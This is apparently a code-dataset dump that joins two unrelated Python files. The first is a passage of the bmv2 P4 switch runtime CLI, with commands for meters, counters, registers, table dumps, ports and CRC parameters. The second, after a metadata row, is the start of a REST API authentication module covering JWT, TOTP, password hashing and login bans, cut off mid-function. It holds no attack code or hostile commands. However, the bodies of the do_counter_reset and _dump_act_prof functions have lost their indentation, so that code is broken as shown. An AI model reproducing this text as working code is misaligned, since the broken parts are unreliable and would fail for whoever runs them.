            "Invalid number of rates, expected %d but got %d"\
            % (meter.rate_count, len(rates))
        )
    new_rates = []
    for rate in rates:
        try:
            r, b = rate.split(':')
            r = float(r)  # info rate (units per microsecond)
            b = int(b)    # burst size
            new_rates.append(BmMeterRateConfig(r, b))
        except:
            raise UIn_Error("Error while parsing rates")
    # direct meters are addressed through their bound table
    if meter.is_direct:
        table_name = meter.binding
        self.client.bm_mt_set_meter_rates(0, table_name, index, new_rates)
    else:
        self.client.bm_meter_set_rates(0, meter.name, index, new_rates)
def complete_meter_set_rates(self, text, line, start_index, end_index):
    # readline tab-completion: suggest meter array names
    return self._complete_meters(text)
@handle_bad_input
def do_meter_get_rates(self, line):
    "Retrieve rates for a meter: meter_get_rates <name> <index>"
    args = line.split()
    self.exactly_n_args(args, 2)
    meter_name = args[0]
    meter = self.get_res("meter", meter_name, ResType.meter_array)
    try:
        index = int(args[1])
    except:
        raise UIn_Error("Bad format for index")
    # meter.rate_count
    # direct meters are addressed through their bound table
    if meter.is_direct:
        table_name = meter.binding
        rates = self.client.bm_mt_get_meter_rates(0, table_name, index)
    else:
        rates = self.client.bm_meter_get_rates(0, meter.name, index)
    if len(rates) != meter.rate_count:
        print "WARNING: expected", meter.rate_count, "rates",
        print "but only received", len(rates)
    for idx, rate in enumerate(rates):
        print "{}: info rate = {}, burst size = {}".format(
            idx, rate.units_per_micros, rate.burst_size)
def complete_meter_get_rates(self, text, line, start_index, end_index):
    # readline tab-completion: suggest meter array names
    return self._complete_meters(text)
def _complete_meters(self, text):
    # complete against the loaded meter array names
    return self._complete_res(METER_ARRAYS, text)
@handle_bad_input
def do_counter_read(self, line):
    "Read counter value: counter_read <name> <index>"
    args = line.split()
    self.exactly_n_args(args, 2)
    counter_name = args[0]
    counter = self.get_res("counter", counter_name, ResType.counter_array)
    index = args[1]
    try:
        index = int(index)
    except:
        raise UIn_Error("Bad format for index")
    # direct counters are addressed through their bound table, with the
    # entry handle as index
    if counter.is_direct:
        table_name = counter.binding
        print "this is the direct counter for table", table_name
        # index = index & 0xffffffff
        value = self.client.bm_mt_read_counter(0, table_name, index)
    else:
        value = self.client.bm_counter_read(0, counter.name, index)
    print "%s[%d]= " % (counter_name, index), value
def complete_counter_read(self, text, line, start_index, end_index):
    # readline tab-completion: suggest counter array names
    return self._complete_counters(text)
@handle_bad_input
def do_counter_reset(self, line):
"Reset counter: counter_reset <name>"
args = line.split()
self.exactly_n_args(args, 1)
counter_name = args[0]
counter = self.get_res("counter", counter_name, ResType.counter_array)
if counter.is_direct:
table_name = counter.binding
print "this is the direct counter for table", table_name
value = self.client.bm_mt_reset_counters(0, table_name)
else:
value = self.client.bm_counter_reset_all(0, counter.name)
def complete_counter_reset(self, text, line, start_index, end_index):
    # readline tab-completion: suggest counter array names
    return self._complete_counters(text)
def _complete_counters(self, text):
    # complete against the loaded counter array names
    return self._complete_res(COUNTER_ARRAYS, text)
@handle_bad_input
def do_register_read(self, line):
    "Read register value: register_read <name> [index]"
    args = line.split()
    self.at_least_n_args(args, 1)
    register_name = args[0]
    register = self.get_res("register", register_name,
                            ResType.register_array)
    if len(args) > 1:
        self.exactly_n_args(args, 2)
        index = args[1]
        try:
            index = int(index)
        except:
            raise UIn_Error("Bad format for index")
        value = self.client.bm_register_read(0, register.name, index)
        print "{}[{}]=".format(register_name, index), value
    else:
        # no index: dump every cell of the array
        sys.stderr.write("register index omitted, reading entire array\n")
        entries = self.client.bm_register_read_all(0, register.name)
        print "{}=".format(register_name), ", ".join(
            [str(e) for e in entries])
def complete_register_read(self, text, line, start_index, end_index):
    # readline tab-completion: suggest register array names
    return self._complete_registers(text)
@handle_bad_input
def do_register_write(self, line):
    "Write register value: register_write <name> <index> <value>"
    args = line.split()
    self.exactly_n_args(args, 3)
    register_name = args[0]
    register = self.get_res("register", register_name,
                            ResType.register_array)
    index = args[1]
    try:
        index = int(index)
    except:
        raise UIn_Error("Bad format for index")
    value = args[2]
    try:
        value = int(value)
    except:
        raise UIn_Error("Bad format for value, must be an integer")
    self.client.bm_register_write(0, register.name, index, value)
def complete_register_write(self, text, line, start_index, end_index):
    # readline tab-completion: suggest register array names
    return self._complete_registers(text)
@handle_bad_input
def do_register_reset(self, line):
    "Reset all the cells in the register array to 0: register_reset <name>"
    args = line.split()
    self.exactly_n_args(args, 1)
    register_name = args[0]
    # bug fix: 'register' was referenced below without ever being looked
    # up, so the command always failed with a NameError; resolve the
    # resource exactly like register_read / register_write do
    register = self.get_res("register", register_name,
                            ResType.register_array)
    self.client.bm_register_reset(0, register.name)
def complete_register_reset(self, text, line, start_index, end_index):
    # readline tab-completion: suggest register array names
    return self._complete_registers(text)
def _complete_registers(self, text):
    # complete against the loaded register array names
    return self._complete_res(REGISTER_ARRAYS, text)
def dump_action_and_data(self, action_name, action_data):
    # print an action and its parameters, hex-encoding each byte string
    def hexstr(v):
        return "".join("{:02x}".format(ord(c)) for c in v)

    print "Action entry: {} - {}".format(
        action_name, ", ".join([hexstr(a) for a in action_data]))
def dump_action_entry(self, a_entry):
    # print an action entry; for indirect tables the entry only stores a
    # member or group handle instead of the action data itself
    if a_entry.action_type == BmActionEntryType.NONE:
        print "EMPTY"
    elif a_entry.action_type == BmActionEntryType.ACTION_DATA:
        self.dump_action_and_data(a_entry.action_name, a_entry.action_data)
    elif a_entry.action_type == BmActionEntryType.MBR_HANDLE:
        print "Index: member({})".format(a_entry.mbr_handle)
    elif a_entry.action_type == BmActionEntryType.GRP_HANDLE:
        print "Index: group({})".format(a_entry.grp_handle)
def dump_one_member(self, member):
    # print a single action profile member (handle + action data)
    print "Dumping member {}".format(member.mbr_handle)
    self.dump_action_and_data(member.action_name, member.action_data)
def dump_members(self, members):
    # print every member, separated by a banner line
    for m in members:
        print "**********"
        self.dump_one_member(m)
def dump_one_group(self, group):
    # print a single action profile group (handle + member handles)
    print "Dumping group {}".format(group.grp_handle)
    print "Members: [{}]".format(", ".join(
        [str(h) for h in group.mbr_handles]))
def dump_groups(self, groups):
    # print every group, separated by a banner line
    for g in groups:
        print "**********"
        self.dump_one_group(g)
def dump_one_entry(self, table, entry):
    # Pretty-print one table entry: match key (one line per field,
    # formatted according to its match type), priority when relevant,
    # the action entry, and ageing information when present.
    if table.key:
        # column width so the field names line up
        out_name_w = max(20, max([len(t[0]) for t in table.key]))

    def hexstr(v):
        return "".join("{:02x}".format(ord(c)) for c in v)
    def dump_exact(p):
        return hexstr(p.exact.key)
    def dump_lpm(p):
        return "{}/{}".format(hexstr(p.lpm.key), p.lpm.prefix_length)
    def dump_ternary(p):
        return "{} &&& {}".format(hexstr(p.ternary.key),
                                  hexstr(p.ternary.mask))
    def dump_range(p):
        return "{} -> {}".format(hexstr(p.range.start),
                                 hexstr(p.range.end_))
    def dump_valid(p):
        return "01" if p.valid.key else "00"
    # dispatch table: match type name -> field formatter
    pdumpers = {"exact": dump_exact, "lpm": dump_lpm,
                "ternary": dump_ternary, "valid": dump_valid,
                "range": dump_range}

    print "Dumping entry {}".format(hex(entry.entry_handle))
    print "Match key:"
    for p, k in zip(entry.match_key, table.key):
        assert(k[1] == p.type)
        pdumper = pdumpers[MatchType.to_str(p.type)]
        print "* {0:{w}}: {1:10}{2}".format(
            k[0], MatchType.to_str(p.type).upper(),
            pdumper(p), w=out_name_w)
    # negative priority means "no priority" (non ternary/range tables)
    if entry.options.priority >= 0:
        print "Priority: {}".format(entry.options.priority)
    self.dump_action_entry(entry.action_entry)
    if entry.life is not None:
        print "Life: {}ms since hit, timeout is {}ms".format(
            entry.life.time_since_hit_ms, entry.life.timeout_ms)
@handle_bad_input
def do_table_dump_entry(self, line):
    "Display some information about a table entry: table_dump_entry <table name> <entry handle>"
    args = line.split()
    self.exactly_n_args(args, 2)
    table_name = args[0]
    table = self.get_res("table", table_name, ResType.table)
    try:
        entry_handle = int(args[1])
    except:
        raise UIn_Error("Bad format for entry handle")
    entry = self.client.bm_mt_get_entry(0, table.name, entry_handle)
    self.dump_one_entry(table, entry)
def complete_table_dump_entry(self, text, line, start_index, end_index):
    # readline tab-completion: suggest table names
    return self._complete_tables(text)
@handle_bad_input
def do_act_prof_dump_member(self, line):
    "Display some information about a member: act_prof_dump_member <action profile name> <member handle>"
    args = line.split()
    self.exactly_n_args(args, 2)
    act_prof_name = args[0]
    act_prof = self.get_res("action profile", act_prof_name,
                            ResType.action_prof)
    try:
        mbr_handle = int(args[1])
    except:
        raise UIn_Error("Bad format for member handle")
    member = self.client.bm_mt_act_prof_get_member(
        0, act_prof.name, mbr_handle)
    self.dump_one_member(member)
def complete_act_prof_dump_member(self, text, line, start_index, end_index):
    # readline tab-completion: suggest action profile names
    return self._complete_act_profs(text)
# notice the strictly_deprecated=False; I don't consider this command to be
# strictly deprecated because it can be convenient and does not modify the
# action profile so won't create problems
@deprecated_act_prof("act_prof_dump_member", with_selection=False,
                     strictly_deprecated=False)
def do_table_dump_member(self, line):
    "Display some information about a member: table_dump_member <table name> <member handle>"
    pass
def complete_table_dump_member(self, text, line, start_index, end_index):
    # readline tab-completion: suggest table names
    return self._complete_tables(text)
@handle_bad_input
def do_act_prof_dump_group(self, line):
    "Display some information about a group: table_dump_group <action profile name> <group handle>"
    args = line.split()
    self.exactly_n_args(args, 2)
    act_prof_name = args[0]
    act_prof = self.get_res("action profile", act_prof_name,
                            ResType.action_prof)
    try:
        grp_handle = int(args[1])
    except:
        raise UIn_Error("Bad format for group handle")
    group = self.client.bm_mt_act_prof_get_group(
        0, act_prof.name, grp_handle)
    self.dump_one_group(group)
def complete_act_prof_dump_group(self, text, line, start_index, end_index):
    # readline tab-completion: suggest action profile names
    return self._complete_act_profs(text)
# Not strictly deprecated: read-only convenience alias (see note above
# do_table_dump_member for the rationale of strictly_deprecated=False)
@deprecated_act_prof("act_prof_dump_group", with_selection=False,
                     strictly_deprecated=False)
def do_table_dump_group(self, line):
    "Display some information about a group: table_dump_group <table name> <group handle>"
    pass
def complete_table_dump_group(self, text, line, start_index, end_index):
    # readline tab-completion: suggest table names
    return self._complete_tables(text)
def _dump_act_prof(self, act_prof):
act_prof_name = act_prof.name
members = self.client.bm_mt_act_prof_get_members(0, act_prof.name)
print "=========="
print "MEMBERS"
self.dump_members(members)
if act_prof.with_selection:
groups = self.client.bm_mt_act_prof_get_groups(0, act_prof.name)
print "=========="
print "GROUPS"
self.dump_groups(groups)
@handle_bad_input
def do_act_prof_dump(self, line):
    "Display entries in an action profile: act_prof_dump <action profile name>"
    args = line.split()
    self.exactly_n_args(args, 1)
    act_prof_name = args[0]
    act_prof = self.get_res("action profile", act_prof_name,
                            ResType.action_prof)
    self._dump_act_prof(act_prof)
def complete_act_prof_dump(self, text, line, start_index, end_index):
    # readline tab-completion: suggest action profile names
    return self._complete_act_profs(text)
@handle_bad_input
def do_table_dump(self, line):
    "Display entries in a match-table: table_dump <table name>"
    args = line.split()
    self.exactly_n_args(args, 1)
    table_name = args[0]
    table = self.get_res("table", table_name, ResType.table)
    entries = self.client.bm_mt_get_entries(0, table.name)

    print "=========="
    print "TABLE ENTRIES"

    for e in entries:
        print "**********"
        self.dump_one_entry(table, e)

    # for indirect tables, also dump the backing action profile
    if table.type_ == TableType.indirect or\
       table.type_ == TableType.indirect_ws:
        assert(table.action_prof is not None)
        self._dump_act_prof(table.action_prof)

    # default entry
    default_entry = self.client.bm_mt_get_default_entry(0, table.name)
    print "=========="
    print "Dumping default entry"
    self.dump_action_entry(default_entry)

    print "=========="
def complete_table_dump(self, text, line, start_index, end_index):
    # readline tab-completion: suggest table names
    return self._complete_tables(text)
@handle_bad_input
def do_table_dump_entry_from_key(self, line):
    "Display some information about a table entry: table_dump_entry_from_key <table name> <match fields> [priority]"
    args = line.split()
    self.at_least_n_args(args, 1)
    table_name = args[0]
    table = self.get_res("table", table_name, ResType.table)
    # for ternary/range tables the last argument is the priority;
    # NOTE(review): if the user omits it, the last match field is consumed
    # as priority instead -- the num_key_fields check below is the only
    # safety net
    if table.match_type in {MatchType.TERNARY, MatchType.RANGE}:
        try:
            priority = int(args.pop(-1))
        except:
            raise UIn_Error(
                "Table is ternary, but could not extract a valid priority from args"
            )
    else:
        priority = 0
    match_key = args[1:]
    if len(match_key) != table.num_key_fields():
        raise UIn_Error(
            "Table %s needs %d key fields" % (table_name, table.num_key_fields())
        )
    match_key = parse_match_key(table, match_key)
    entry = self.client.bm_mt_get_entry_from_key(
        0, table.name, match_key, BmAddEntryOptions(priority = priority))
    self.dump_one_entry(table, entry)
def complete_table_dump_entry_from_key(self, text, line, start_index, end_index):
    # readline tab-completion: suggest table names
    return self._complete_tables(text)
@handle_bad_input
def do_port_add(self, line):
    "Add a port to the switch (behavior depends on device manager used): port_add <iface_name> <port_num> [pcap_path]"
    args = line.split()
    self.at_least_n_args(args, 2)
    iface_name = args[0]
    try:
        port_num = int(args[1])
    except:
        raise UIn_Error("Bad format for port_num, must be an integer")
    # optional pcap dump path; empty string disables pcap
    pcap_path = ""
    if len(args) > 2:
        pcap_path = args[2]
    self.client.bm_dev_mgr_add_port(iface_name, port_num, pcap_path)
@handle_bad_input
def do_port_remove(self, line):
    "Removes a port from the switch (behavior depends on device manager used): port_remove <port_num>"
    args = line.split()
    self.exactly_n_args(args, 1)
    try:
        port_num = int(args[0])
    except:
        raise UIn_Error("Bad format for port_num, must be an integer")
    self.client.bm_dev_mgr_remove_port(port_num)
@handle_bad_input
def do_show_ports(self, line):
    "Shows the ports connected to the switch: show_ports"
    self.exactly_n_args(line.split(), 0)
    ports = self.client.bm_dev_mgr_show_ports()
    # fixed-width columns: port #, iface, status, then free-form extras
    print "{:^10}{:^20}{:^10}{}".format(
        "port #", "iface name", "status", "extra info")
    print "=" * 50
    for port_info in ports:
        status = "UP" if port_info.is_up else "DOWN"
        extra_info = "; ".join(
            [k + "=" + v for k, v in port_info.extra.items()])
        print "{:^10}{:^20}{:^10}{}".format(
            port_info.port_num, port_info.iface_name, status, extra_info)
@handle_bad_input
def do_switch_info(self, line):
    "Show some basic info about the switch: switch_info"
    self.exactly_n_args(line.split(), 0)
    info = self.client.bm_mgmt_get_info()
    # walk the thrift struct spec to print every attribute generically
    attributes = [t[2] for t in info.thrift_spec[1:]]
    out_attr_w = 5 + max(len(a) for a in attributes)
    for a in attributes:
        print "{:{w}}: {}".format(a, getattr(info, a), w=out_attr_w)
@handle_bad_input
def do_reset_state(self, line):
    "Reset all state in the switch (table entries, registers, ...), but P4 config is preserved: reset_state"
    self.exactly_n_args(line.split(), 0)
    self.client.bm_reset_state()
@handle_bad_input
def do_write_config_to_file(self, line):
    "Retrieves the JSON config currently used by the switch and dumps it to user-specified file"
    args = line.split()
    self.exactly_n_args(args, 1)
    filename = args[0]
    json_cfg = self.client.bm_get_config()
    with open(filename, 'w') as f:
        f.write(json_cfg)
@handle_bad_input
def do_serialize_state(self, line):
    "Serialize the switch state and dumps it to user-specified file"
    args = line.split()
    self.exactly_n_args(args, 1)
    filename = args[0]
    state = self.client.bm_serialize_state()
    with open(filename, 'w') as f:
        f.write(state)
def set_crc_parameters_common(self, line, crc_width=16):
    # Shared implementation of set_crc16/32_parameters: the conversion
    # function, thrift config struct and thrift call are all selected by
    # crc_width (16 or 32).
    conversion_fn = {16: hex_to_i16, 32: hex_to_i32}[crc_width]
    config_type = {16: BmCrc16Config, 32: BmCrc32Config}[crc_width]
    thrift_fn = {16: self.client.bm_set_crc16_custom_parameters,
                 32: self.client.bm_set_crc32_custom_parameters}[crc_width]
    args = line.split()
    # <name> <polynomial> <init remainder> <final xor> <reflect data?> <reflect remainder?>
    self.exactly_n_args(args, 6)
    name = args[0]
    if name not in CUSTOM_CRC_CALCS or CUSTOM_CRC_CALCS[name] != crc_width:
        raise UIn_ResourceError("crc{}_custom".format(crc_width), name)
    config_args = [conversion_fn(a) for a in args[1:4]]
    config_args += [parse_bool(a) for a in args[4:6]]
    crc_config = config_type(*config_args)
    thrift_fn(0, name, crc_config)
def _complete_crc(self, text, crc_width=16):
    # complete against the custom crc calculations of the given width
    crcs = sorted(
        [c for c, w in CUSTOM_CRC_CALCS.items() if w == crc_width])
    if not text:
        return crcs
    return [c for c in crcs if c.startswith(text)]
@handle_bad_input
def do_set_crc16_parameters(self, line):
    "Change the parameters for a custom crc16 hash: set_crc16_parameters <name> <polynomial> <initial remainder> <final xor value> <reflect data?> <reflect remainder?>"
    self.set_crc_parameters_common(line, 16)
def complete_set_crc16_parameters(self, text, line, start_index, end_index):
    # readline tab-completion: suggest crc16 custom calculation names
    return self._complete_crc(text, 16)
@handle_bad_input
def do_set_crc32_parameters(self, line):
    "Change the parameters for a custom crc32 hash: set_crc32_parameters <name> <polynomial> <initial remainder> <final xor value> <reflect data?> <reflect remainder?>"
    self.set_crc_parameters_common(line, 32)
def complete_set_crc32_parameters(self, text, line, start_index, end_index):
    # readline tab-completion: suggest crc32 custom calculation names
    return self._complete_crc(text, 32)
def load_json_config(standard_client=None, json_path=None):
    # Load the switch's JSON config (from file, or fetched through the
    # client) and populate the module-level resource maps.
    load_json_str(utils.get_json_config(standard_client, json_path))
def get_api(port=9090):
    # Convenience entry point: connect to a local switch on the given
    # thrift port, load its config and return a ready-to-use RuntimeAPI
    # (assumes a SimplePreLAG packet replication engine).
    standard_client, mc_client = thrift_connect(
        '127.0.0.1', port,
        RuntimeAPI.get_thrift_services(PreType.SimplePreLAG)
    )
    load_json_config(standard_client, None)
    return RuntimeAPI(PreType.SimplePreLAG, standard_client, mc_client)
| 36.529734 | 172 | 0.619071 |
bd0789f5e1a93d01586ba30704cbd107a248cfa7 | 45,996 | py | Python | restapi/services/authentication.py | rapydo/http-api | ef0a299173195145303069534d45d446ea4da93a | [
"MIT"
] | 8 | 2018-07-04T09:54:46.000Z | 2022-03-17T08:21:06.000Z | restapi/services/authentication.py | rapydo/http-api | ef0a299173195145303069534d45d446ea4da93a | [
"MIT"
] | 19 | 2018-04-18T07:24:55.000Z | 2022-03-04T01:03:15.000Z | restapi/services/authentication.py | rapydo/http-api | ef0a299173195145303069534d45d446ea4da93a | [
"MIT"
] | 7 | 2018-07-03T12:17:50.000Z | 2021-05-05T04:33:32.000Z | import base64
import re
from abc import ABCMeta, abstractmethod
from datetime import datetime, timedelta
from enum import Enum
from functools import lru_cache
from io import BytesIO
from pathlib import Path
from typing import (
TYPE_CHECKING,
Any,
Dict,
List,
Optional,
Tuple,
TypedDict,
Union,
cast,
)
import jwt
import pyotp
import pytz
import segno
from cryptography.fernet import Fernet
from cryptography.fernet import InvalidToken as InvalidFernetToken
from flask import request
from glom import glom
from jwt.exceptions import ExpiredSignatureError, ImmatureSignatureError
from passlib.context import CryptContext
from restapi.config import (
BACKEND_HOSTNAME,
BOT_HOSTNAME,
HOST_TYPE,
JWT_SECRET_FILE,
PRODUCTION,
PROXIED_CONNECTION,
TESTING,
TOTP_SECRET_FILE,
get_frontend_url,
get_project_configuration,
)
from restapi.env import Env
from restapi.exceptions import (
BadRequest,
Conflict,
Forbidden,
RestApiException,
ServerError,
ServiceUnavailable,
Unauthorized,
)
from restapi.types import Props
from restapi.utilities import print_and_exit
from restapi.utilities.globals import mem
from restapi.utilities.logs import Events, log, save_event_log
from restapi.utilities.time import EPOCH, get_now
from restapi.utilities.uuid import getUUID
# Trick to avoid circular dependencies
if TYPE_CHECKING: # pragma: no cover
from restapi.connectors import Connector
User = Any
Group = Any
RoleObj = Any
Login = Any
class AuthMissingTOTP(Exception):
    """Raised when an operation requires a TOTP code that was not provided."""

    pass
def import_secret(abs_filename: Path) -> bytes:
    """Load a shared secret from file, creating it on first use.

    Containers other than the backend and the bot get a throw-away key,
    so anything they sign/encrypt is invalid for the real services.

    :param abs_filename: path of the secret file
    :return: the secret, as raw bytes
    """
    if HOST_TYPE != BACKEND_HOSTNAME and HOST_TYPE != BOT_HOSTNAME:  # pragma: no cover
        return Fernet.generate_key()

    try:
        # read_bytes opens and closes the file; the previous bare
        # open(abs_filename, "rb").read() leaked the file descriptor
        return abs_filename.read_bytes()

    # Can't be covered because it is execute once before the tests...
    except OSError:  # pragma: no cover
        key = Fernet.generate_key()
        abs_filename.write_bytes(key)
        # readable by the owner only
        abs_filename.chmod(0o400)
        return key
# passlib context used to hash and verify user passwords (bcrypt)
pwd_context = CryptContext(schemes=["bcrypt"], deprecated="auto")

# special role markers used in place of a concrete role name
ALL_ROLES = "all"
ANY_ROLE = "any"
ROLE_DISABLED = "disabled"

DEFAULT_GROUP_NAME = "Default"
DEFAULT_GROUP_DESCR = "Default group"

# bounds applied to security settings while TESTING, so that the test
# suite can exercise them without hanging or tripping accidentally
# (note: "TESTNIG" is a pre-existing typo, kept to avoid breaking callers)
DISABLE_UNUSED_CREDENTIALS_AFTER_MIN_TESTNIG_VALUE = 60
MAX_PASSWORD_VALIDITY_MIN_TESTNIG_VALUE = 60
MAX_LOGIN_ATTEMPTS_MIN_TESTING_VALUE = 10
LOGIN_BAN_TIME_MAX_TESTING_VALUE = 10
# Produced by fill_payload
class Payload(TypedDict, total=False):
    # JWT claims before encoding; datetimes are converted to int by the
    # JWT library on encode (see DecodedPayload below)
    user_id: str
    jti: str  # unique token identifier
    t: str  # token type
    iat: datetime  # issued at
    nbf: datetime  # not before
    exp: datetime  # expiration
# Produced by unpack_token. Datetimes are converted to int as specified in rfc7519
# https://tools.ietf.org/html/rfc7519#page-10
class DecodedPayload(TypedDict, total=False):
    user_id: str
    jti: str  # unique token identifier
    t: str  # token type
    iat: int  # issued at (unix timestamp)
    nbf: int  # not before (unix timestamp)
    exp: int  # expiration (unix timestamp)
class Token(TypedDict, total=False):
    # Serialized view of a stored token, as exposed to the API layer
    id: str
    token: str  # the signed JWT itself
    token_type: str
    emitted: datetime
    last_access: datetime
    expiration: datetime
    IP: str  # IP address the token was emitted for
    location: str
    user: Optional[User]
class Role(Enum):
    # Built-in authorization roles; the values are the role names as
    # persisted by the authentication backend
    ADMIN = "admin_root"
    COORDINATOR = "group_coordinator"
    STAFF = "staff_user"
    USER = "normal_user"
class InvalidToken(Exception):
    """Raised when a token fails verification and must be rejected."""

    pass
# ##############################################################################
# Utility functions used to adapt security settings to Testable values
def get_timedelta(val: int, min_testing_val: int = 0) -> Optional[timedelta]:
    """Translate a configuration value into a timedelta (None = disabled).

    In production the value is a number of days; while testing it is
    treated as seconds, raised to at least min_testing_val, so that the
    behaviour can actually be exercised by the test suite.
    """
    if not val:
        return None

    if not TESTING:
        # Of course cannot be tested
        return timedelta(days=val)  # pragma: no cover

    seconds = val if val >= min_testing_val else min_testing_val
    return timedelta(seconds=seconds)
def get_max_login_attempts(val: int) -> int:
    """Return the configured maximum number of failed logins.

    While testing, any non-zero setting is raised to at least
    MAX_LOGIN_ATTEMPTS_MIN_TESTING_VALUE so that ordinary tests do not
    accidentally trip the limit.
    """
    if not TESTING or not val:
        return val
    # min 10 failures, otherwise normal tests will start to fail
    return max(val, MAX_LOGIN_ATTEMPTS_MIN_TESTING_VALUE)
def get_login_ban_time(val: int) -> int:
    """Return the configured login ban time.

    While testing, any non-zero ban is capped at
    LOGIN_BAN_TIME_MAX_TESTING_VALUE so the test suite does not hang.
    """
    if not TESTING or not val:
        return val
    # max 10 seconds, otherwise tests will hang
    return min(val, LOGIN_BAN_TIME_MAX_TESTING_VALUE)
# ##############################################################################
class BaseAuthentication(metaclass=ABCMeta):
    """
    An almost abstract class with methods
    to be implemented with a new service
    that aims to store credentials of users and roles.
    """

    # Secrets loaded once at class-definition time from mounted secret files
    JWT_SECRET: str = import_secret(JWT_SECRET_FILE).decode()
    fernet = Fernet(import_secret(TOTP_SECRET_FILE))
    # JWT_ALGO = 'HS256'
    # Should be faster on 64bit machines
    JWT_ALGO = "HS512"

    # 1 month in seconds
    DEFAULT_TOKEN_TTL = Env.get_int("AUTH_JWT_TOKEN_TTL", 2_592_000)
    # Grace period before starting to evaluate IP address on token validation
    GRACE_PERIOD = timedelta(seconds=Env.get_int("AUTH_TOKEN_IP_GRACE_PERIOD", 7200))
    SAVE_LAST_ACCESS_EVERY = timedelta(
        seconds=Env.get_int("AUTH_TOKEN_SAVE_FREQUENCY", 60)
    )

    # Short codes stored in the "t" claim to mark the token purpose
    FULL_TOKEN = "f"
    PWD_RESET = "r"
    ACTIVATE_ACCOUNT = "a"
    UNLOCK_CREDENTIALS = "u"
    TOTP = "TOTP"

    MIN_PASSWORD_LENGTH = Env.get_int("AUTH_MIN_PASSWORD_LENGTH", 8)
    SECOND_FACTOR_AUTHENTICATION = Env.get_bool(
        "AUTH_SECOND_FACTOR_AUTHENTICATION", False
    )
    TOTP_VALIDITY_WINDOW = Env.get_int("AUTH_TOTP_VALIDITY_WINDOW", 1)

    # enabled if explicitly set or for 2FA is enabled
    FORCE_FIRST_PASSWORD_CHANGE = SECOND_FACTOR_AUTHENTICATION or Env.get_bool(
        "AUTH_FORCE_FIRST_PASSWORD_CHANGE", False
    )

    MAX_PASSWORD_VALIDITY: Optional[timedelta] = get_timedelta(
        Env.get_int("AUTH_MAX_PASSWORD_VALIDITY", 0),
        MAX_PASSWORD_VALIDITY_MIN_TESTNIG_VALUE,
    )

    DISABLE_UNUSED_CREDENTIALS_AFTER: Optional[timedelta] = get_timedelta(
        Env.get_int("AUTH_DISABLE_UNUSED_CREDENTIALS_AFTER", 0),
        # min 60 seconds are required when testing
        DISABLE_UNUSED_CREDENTIALS_AFTER_MIN_TESTNIG_VALUE,
    )

    MAX_LOGIN_ATTEMPTS = get_max_login_attempts(
        Env.get_int("AUTH_MAX_LOGIN_ATTEMPTS", 8)
    )
    FAILED_LOGINS_EXPIRATION: timedelta = timedelta(
        seconds=get_login_ban_time(Env.get_int("AUTH_LOGIN_BAN_TIME", 3600))
    )

    # Populated by module_initialization at startup
    default_user: Optional[str] = None
    default_password: Optional[str] = None
    roles: List[str] = []
    roles_data: Dict[str, str] = {}
    default_role: str = Role.USER.value
    # This is to let inform mypy about the existence of self.db
    def __init__(self) -> None:  # pragma: no cover
        # Concrete subclasses are expected to assign the database connector here
        self.db: "Connector"
    # Executed once by Connector in init_app
    @classmethod
    def module_initialization(cls) -> None:
        """Load default credentials and role definitions at startup."""
        cls.load_default_user()
        cls.load_roles()
@staticmethod
def load_default_user() -> None:
BaseAuthentication.default_user = Env.get("AUTH_DEFAULT_USERNAME", "")
BaseAuthentication.default_password = Env.get("AUTH_DEFAULT_PASSWORD", "")
if (
not BaseAuthentication.default_user
or not BaseAuthentication.default_password
): # pragma: no cover
print_and_exit("Default credentials are unavailable!")
@staticmethod
def load_roles() -> None:
empty_dict: Dict[str, str] = {}
BaseAuthentication.roles_data = glom(
mem.configuration, "variables.roles", default=empty_dict
).copy()
if not BaseAuthentication.roles_data: # pragma: no cover
print_and_exit("No roles configured")
BaseAuthentication.default_role = BaseAuthentication.roles_data.pop(
"default", ""
)
if not BaseAuthentication.default_role: # pragma: no cover
print_and_exit("Default role not available!")
BaseAuthentication.roles = []
for role, description in BaseAuthentication.roles_data.items():
if description != ROLE_DISABLED:
BaseAuthentication.roles.append(role)
    def make_login(
        self, username: str, password: str, totp_code: Optional[str]
    ) -> Tuple[str, Payload, User]:
        """Authenticate a user and emit a full token.

        Raises Unauthorized / BadRequest / Forbidden / ServiceUnavailable /
        AuthMissingTOTP on the various failure paths. The ban check runs
        first so blocked accounts never reach password verification.
        """
        self.verify_blocked_username(username)

        try:
            user = self.get_user(username=username)
        except ValueError as e:  # pragma: no cover
            # SqlAlchemy can raise the following error:
            # A string literal cannot contain NUL (0x00) characters.
            log.error(e)
            raise BadRequest("Invalid input received")
        except Exception as e:  # pragma: no cover
            log.error("Unable to connect to auth backend\n[{}] {}", type(e), e)
            raise ServiceUnavailable("Unable to connect to auth backend")

        if user is None:
            # Unknown username: still record the failure to feed the ban counter
            self.register_failed_login(username, user=None)
            self.log_event(
                Events.failed_login,
                payload={"username": username},
                user=user,
            )
            raise Unauthorized("Invalid access credentials", is_warning=True)

        # Currently only credentials are allowed
        if user.authmethod != "credentials":  # pragma: no cover
            raise BadRequest("Invalid authentication method")

        if not self.verify_password(password, user.password):
            self.log_event(
                Events.failed_login,
                payload={"username": username},
                user=user,
            )
            self.register_failed_login(username, user=user)
            raise Unauthorized("Invalid access credentials", is_warning=True)

        # Password is valid: now check active/inactivity/expiration status
        self.verify_user_status(user)

        if self.SECOND_FACTOR_AUTHENTICATION and not totp_code:
            raise AuthMissingTOTP()

        if totp_code:
            self.verify_totp(user, totp_code)

        # Token expiration is capped by the user expiration date, if set
        payload, full_payload = self.fill_payload(user, expiration=user.expiration)
        token = self.create_token(payload)

        self.save_login(username, user, failed=False)
        self.log_event(Events.login, user=user)
        return token, full_payload, user
# #####################
# # Password handling #
####################
@staticmethod
def verify_password(plain_password: str, hashed_password: str) -> bool:
try:
return cast(bool, pwd_context.verify(plain_password, hashed_password))
except ValueError as e: # pragma: no cover
log.error(e)
return False
@staticmethod
def get_password_hash(password: Optional[str]) -> str:
if not password:
raise Unauthorized("Invalid password")
# CryptContext is no typed.. but this is a string!
return cast(str, pwd_context.hash(password))
    @staticmethod
    def get_remote_ip(raise_warnings: bool = True) -> str:
        """Best-effort resolution of the client IP from the current request.

        Trusts X-Forwarded-For only when PROXIED_CONNECTION is enabled,
        otherwise reads X-Real-Ip; falls back to request.remote_addr and,
        outside of a request context, to a mocked 0.0.0.0.
        """
        try:
            # Syntax: X-Forwarded-For: <client>, <proxy1>, <proxy2>
            # <client> The client IP address
            # <proxy1>, <proxy2> If a request goes through multiple proxies, the
            # IP addresses of each successive proxy is listed. This means, the
            # right-most IP address is the IP address of the most recent proxy
            # and the left-most IP address is the IP address of the originating
            # client.
            if PROXIED_CONNECTION:
                header_key = "X-Forwarded-For"
                if forwarded_ips := request.headers.getlist(header_key):
